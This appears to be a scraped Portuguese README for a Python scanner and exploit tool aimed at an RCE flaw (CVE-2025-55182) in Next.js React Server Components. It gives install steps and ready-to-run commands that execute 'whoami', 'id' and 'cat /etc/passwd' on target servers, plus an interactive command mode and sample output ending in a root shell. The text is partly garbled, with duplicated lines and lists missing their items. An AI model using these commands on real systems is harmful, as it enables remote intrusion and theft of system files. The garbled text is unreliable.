
Um scanner de segurança baseado em Python para detectar e explorar vulnerabilidades em **React Server Components (RSC)** em aplicações Next.js. Esta ferramenta realiza detecção passiva, fingerprinting ativo e testes de exploração de RCE.
Um scanner de segurança baseado em Python para detectar e explorar vulnerabilidades em React Server Components (RSC) em aplicações Next.js. Esta ferramenta realiza detecção passiva, fingerprinting ativo e testes de exploração de RCE.
⚠️ AVISO: Esta ferramenta é apenas para testes de segurança autorizados. O acesso não autorizado a sistemas de computadores é ilegal. Sempre obtenha permissão por escrito antes de testar.
✅ Detecção Passiva - Analisa HTML, cabeçalhos e estrutura da página em busca de indicadores de RSC
✅ Fingerprinting Ativo - Envia cabeçalhos específicos de RSC para detectar respostas do servidor
✅ Análise de Cabeçalhos HTTP - Identifica cabeçalhos relacionados a Next.js e RSC
✅ Exploração de RCE - Executa comandos em servidores vulneráveis (se explorável)
✅ Saída Colorida no Terminal - Feedback visual aprimorado para melhor legibilidade
✅ Modo Interativo - Execute múltiplos comandos no modo de exploração
✅ Decodificação Robusta - Lida com payloads compactados com gzip e binários
Clone o repositório
git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
cd CVE-2025-55182
Instale as dependências
pip install -r requirements.txt
Pacotes necessários:
requests>=2.28.0 - Biblioteca cliente HTTPurllib3>=1.26.0 - Utilitários HTTP avançadoscolorama>=0.4.6 - Cores no terminal (compatível com Windows)beautifulsoup4 - Análise de HTMLpython rsc_detector.py https://example.com
python rsc_detector.py https://example.com --exploit
python rsc_detector.py https://example.com --exploit --cmd "whoami"
python rsc_detector.py https://example.com --exploit
Em seguida, digite os comandos no prompt (digite quit para sair).
| Opção | Descrição |
|---|---|
<URL> | URL alvo (obrigatória). Adiciona https:// automaticamente se ausente |
--exploit | Habilita a exploração de RCE após a detecção |
--cmd <command> | Executa um comando específico (use com --exploit) |
Detectar vulnerabilidade RSC:
python rsc_detector.py https://target.com
Explorar e executar o comando id:
python rsc_detector.py https://target.com --exploit --cmd "id"
Explorar e executar cat /etc/passwd:
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"
Modo interativo (múltiplos comandos):
python rsc_detector.py https://target.com --exploit
window.__next_f (App Router do Next.js)text/x-component__NEXT_DATA__ e imports do Next.jsServer, Vary e X-Nextjs-CacheRSC: 1[*] Starting RSC Detection Scan on: https://example.com
====================================================================
[1] Running Passive Scan...
Status: DETECTED
Score: 80/100
- Found: window.__next_f (App Router)
[2] Analyzing Headers...
- Vary header includes RSC: ...
[3] Running Active Fingerprint...
Status: DETECTED
- Response Content-Type became text/x-component
- Vary header contains 'RSC'
====================================================================
[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
Consider: RCE exploitation may be possible
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root
CVE-2025-55182 explora:
child_process.execSync()Esta ferramenta é EXCLUSIVAMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS:
O acesso não autorizado a computadores é ilegal de acordo com:
Se você descobrir uma vulnerabilidade usando esta ferramenta:
A ferramenta ignora a verificação SSL por padrão. Para habilitar a verificação:
detector = RSCDetector(url, verify_ssl=True)
A ferramenta automaticamente:
Aumente o timeout no código:
response = self.session.get(self.url, timeout=30) # 30 seconds
CVE-2025-55182/
├── README.md # This file
├── requirements.txt # Python dependencies
├── rsc_detector.py # Main scanner & exploit engine
├── rsc_cli.py # CLI utilities (if present)
├── script.py # Additional scripts (if present)
├── COLOR_GUIDE.md # Color output documentation
└── .gitignore # Git ignore rules
requests>=2.28.0 # HTTP requests
urllib3>=1.26.0 # Advanced HTTP
beautifulsoup4>=4.11.0 # HTML parsing
colorama>=0.4.6 # Terminal colors (Windows)
Instale tudo de uma vez:
pip install -r requirements.txt